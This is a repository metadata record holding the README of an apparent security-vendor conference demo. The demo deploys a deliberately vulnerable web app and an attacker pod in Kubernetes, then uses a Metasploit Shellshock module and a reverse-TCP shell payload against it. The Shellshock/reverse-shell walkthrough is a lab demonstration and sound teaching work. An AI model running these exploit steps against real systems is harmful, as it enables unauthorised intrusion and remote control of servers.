{"id":24938550,"url":"https://github.com/checkpointsw-community/vulnerable-containers","last_synced_at":"2026-02-11T23:39:05.769Z","repository":{"id":240259787,"uuid":"413925794","full_name":"CheckPointSW-Community/vulnerable-containers","owner":"CheckPointSW-Community","description":null,"archived":false,"fork":false,"pushed_at":"2021-10-05T18:25:30.000Z","size":20983,"stargazers_count":0,"open_issues_count":0,"forks_count":2,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-09-01T13:02:16.004Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"HTML","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/CheckPointSW-Community.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2021-10-05T17:57:59.000Z","updated_at":"2021-10-05T18:25:33.000Z","dependencies_parsed_at":"2024-05-17T16:55:01.583Z","dependency_job_id":null,"html_url":"https://github.com/CheckPointSW-Community/vulnerable-containers","commit_stats":null,"previous_names":["checkpointsw-community/vulnerable-containers"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/CheckPointSW-Community/vulnerable-containers","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/CheckPointSW-Community%2Fvulnerable-containers","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/CheckPointSW-Community%2Fvulnerable-containers/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/CheckPointSW-Community%2Fvulnerable-containers/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/CheckPointSW-Community%2Fvulnerable-containers/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/CheckPointSW-Community","download_url":"https://codeload.github.com/CheckPointSW-Community/vulnerable-containers/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/CheckPointSW-Community%2Fvulnerable-containers/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":29349623,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-02-11T20:11:40.865Z","status":"ssl_error","status_checked_at":"2026-02-11T20:10:41.637Z","response_time":97,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.5:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2025-02-02T17:58:39.934Z","updated_at":"2026-02-11T23:39:05.753Z","avatar_url":"https://github.com/CheckPointSW-Community.png","language":"HTML","funding_links":[],"categories":[],"sub_categories":[],"readme":"# CPX 2021 demo\n\u003c!-- vim-markdown-toc GFM --\u003e\n\n* [Requirements](#requirements)\n* [Installation](#installation)\n* [Demo](#demo)\n* [Cleanup](#cleanup)\n* [Attacker from external VM](#attacker-from-external-vm)\n* [Tips](#tips)\n\n\u003c!-- vim-markdown-toc --\u003e\n\n# Requirements\n\n- [Helm3](https://helm.sh/)\n- *Highly recommended*:][K9S](https://github.com/derailed/k9s)\n- If you want to demo using the hard way: [kubectl](https://kubernetes.io/docs/tasks/tools/install-kubectl/)\n\n# Installation\n\u003e Make sure you are using Helm3 client\n```bash\n# Install our sushi restaurant web page\nhelm install -f cpx-sushi/values.yaml --namespace sushi --create-namespace sushi-restaurant cpx-sushi\n# Install the attacker client\nhelm install -f attacker-cpx/values.yaml --namespace attacker --create-namespace attacker-client attacker-cpx\n# Ignore the stdout printed by helm\n```\n\n# Demo\n\nRun K9S, check the namespace 'vulnerable' and verify there are 2 pods running\nthere:\n\n- metasploit-client: We will use this as the \"attacker machine\"\n- vuln-app-cpx-helm-vulnerable: We will use this as the \"victim machine\"\n\nVerify the vulnerable namespace has a LoadBalancer service which is has an\nexternal-IP assigned. Write down this value as we will need it during the\nattack phase. This will allow attacking the application even from outside the\nK8S cluster.\n\nStart a shell within the metasploit container and execute:\n```bash\ncd /usr/src/metasploit-framework\n./msfconsole -r docker/msfconsole.rc -y $APP_HOME/config/database.yml\n# The metasploit framework shall start...\n```\n\nUsing the metasploit framework we will exploit the \u003ci\u003eapache_mod_cgi_bash_env_exec\u003c/i\u003e:\n```bash\nsearch shellshock\n# Locate the module with the name apache_mod_cgi_bash_env\nuse exploit/multi/http/apache_mod_cgi_bash_env_exec\n# Check available options\nshow options\n# Set RHOST to the external IP of the vuln-app-cpx-helm-vulnerable\nset rhost \u003cexternal-ip\u003e\n# You could also use the internal cluster IP since the metasploit pod has visibility of the vulnerable pod\nset rport 80\nset targeturi /cgi-bin/menu\n# Set the payload\nset payload linux/x86/shell/reverse_tcp\n# Check if target is vulnerable\ncheck\n# Exploit vulnerability\nexploit\n```\n\nAt this point you may get multiple sessions opened in background mode. List\nthem and use one of them to exploit the reverse tcp shell:\n```bash\n#List sessions\nsessions\n# Run interactive shell in session #1\nsessions -i 1\n# Start running commands\nwhoami\nls -la\n```\n#Cleanup\n```bash\nhelm uninstall sushi-restaurant -n sushi\nhelm uninstall attacker-client -n attacker\n```\n# Attacker from external VM\nIn order to setup the attacker machine from an external VM running a\ndistribution like Kali Linux, you will need to assign a public IP address to\nthis machine so that it is reachable. Additionally, the port where the the\nreverse shell connection will be established needs to be allowed for input\nconnections (i.e: In AWS the security group of the EC2 instance needs to allow\ninput connections to port \u003cX\u003e)\n\nHow to run the exploit is very similar. First ssh into the Kali Linux machine:\n```bash\n# Start metasploit console\nmsfconsole\n# Follow the same steps that we already described\n# We will need to set a few extra options\nset lhost \u003cpublic-ip-of-vm\u003e\nset lport \u003cport-that-we-allow-input-connections\u003e\n# set lport 4444\ncheck\nexploit\n```\n\n# Tips\n\n- Use K9S client to demonstrate interactively how to perform the attack, it\n  will save sometime if you need to run kubectl all the time\n\n  \n  \n  \n*Based on original demo created [here:](https://github.com/chkp-ivanmar/cpx-2021-demo)*\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fcheckpointsw-community%2Fvulnerable-containers","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fcheckpointsw-community%2Fvulnerable-containers","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fcheckpointsw-community%2Fvulnerable-containers/lists"}